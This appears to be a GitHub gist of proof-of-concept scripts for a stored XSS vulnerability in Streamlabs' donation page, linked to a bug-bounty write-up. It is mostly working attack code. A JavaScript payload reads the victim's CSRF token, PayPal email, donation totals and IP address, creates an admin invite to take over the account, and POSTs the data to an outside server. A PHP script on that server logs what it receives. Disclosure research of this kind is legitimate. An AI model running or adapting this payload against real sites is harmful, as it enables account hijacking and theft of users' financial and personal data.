Skip to content

Instantly share code, notes, and snippets.

@NRockhouse
Last active January 29, 2021 19:41
Show Gist options
  • Save NRockhouse/ea453bd9d8bad49d31f027a642341783 to your computer and use it in GitHub Desktop.
Save NRockhouse/ea453bd9d8bad49d31f027a642341783 to your computer and use it in GitHub Desktop.
Streamlabs: Stored XSS in donation page leading to account compromise - Proof-of-Concept (PoC) scripts. Read more: https://blog.rockhouse.dev/2017/12/31/streamlabs-stored-xss-in-donation-page-leading-to-account-compromise-and-my-first-reward/
<?php header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
header("Content-Type: text/plain; charset=UTF-8"); ?>
this.style.display = "none";
alert("StreamLabs.Stored.XSS.Vulnerability-Cheat.Activated!-Alert");
var getLinks = ["https://api.ipify.org", "/api/v5/payment/status", "/api/v5/donation/all"];
var msg = "";
var xhr = new XMLHttpRequest();
var xsrfToken = "";
xhr.open("GET", "https://api.ipify.org", false);
xhr.send();
if (xhr.status == 200) {
msg += xhr.responseText + "|";
}
xhr.open("GET", "/dashboard", false);
xhr.send();
if (xhr.status == 200) {
xsrfToken = xhr.responseText.substring(xhr.responseText.lastIndexOf('<meta name="csrf-token" content="') + '<meta name="csrf-token" content="'.length, xhr.responseText.length - 1);
xsrfToken = xsrfToken.substring(0, xsrfToken.indexOf('"/>'));
msg += xsrfToken + "|";
}
xhr.open("GET", "/api/v5/payment/status", false);
xhr.send();
if (xhr.status == 200) {
msg += JSON.parse(xhr.responseText).paypal.email + "|";
}
xhr.open("GET", "/api/v5/stats?interval=year&date=2017-01-01&tz=-480", false);
xhr.send();
if (xhr.status == 200) {
msg += JSON.parse(xhr.responseText).stats.totals.donation_amount + "|";
}
xhr.open("GET", "/api/v5/user-management/invites", false);
xhr.send();
if (xhr.status == 200) {
var inviCount = JSON.parse(xhr.responseText).data.invitations.length;
var adminInviCount = 0;
if (inviCount > 0) {
for (var i = 0; i < inviCount; i++) {
if (JSON.parse(xhr.responseText).data.invitations[i].role_id == "admin") {
msg += JSON.parse(xhr.responseText).data.invitations[i].invite_url;
adminInviCount += 1;
break;
}
}
}
if (adminInviCount < 1 || inviCount < 1) {
xhr.open("POST", "/api/v5/user-management/invites", false);
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhr.setRequestHeader("x-csrf-token", xsrfToken);
xhr.send(JSON.stringify({
role: "admin"
}));
if (xhr.status == 200) {
msg += JSON.parse(xhr.responseText).data.invite_url;
}
}
}
xhr.open("POST", "https://rockhouse.ga/StreamlabsXSS/senddata.php", false);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("data="+btoa(msg));
<?php
header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
$data = base64_decode($_POST['data']);
$fp = fopen('data.html', 'a');
fwrite($fp, '<b>' . date('r') . '</b> ' . $data . '<br>');
fclose($fp);
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment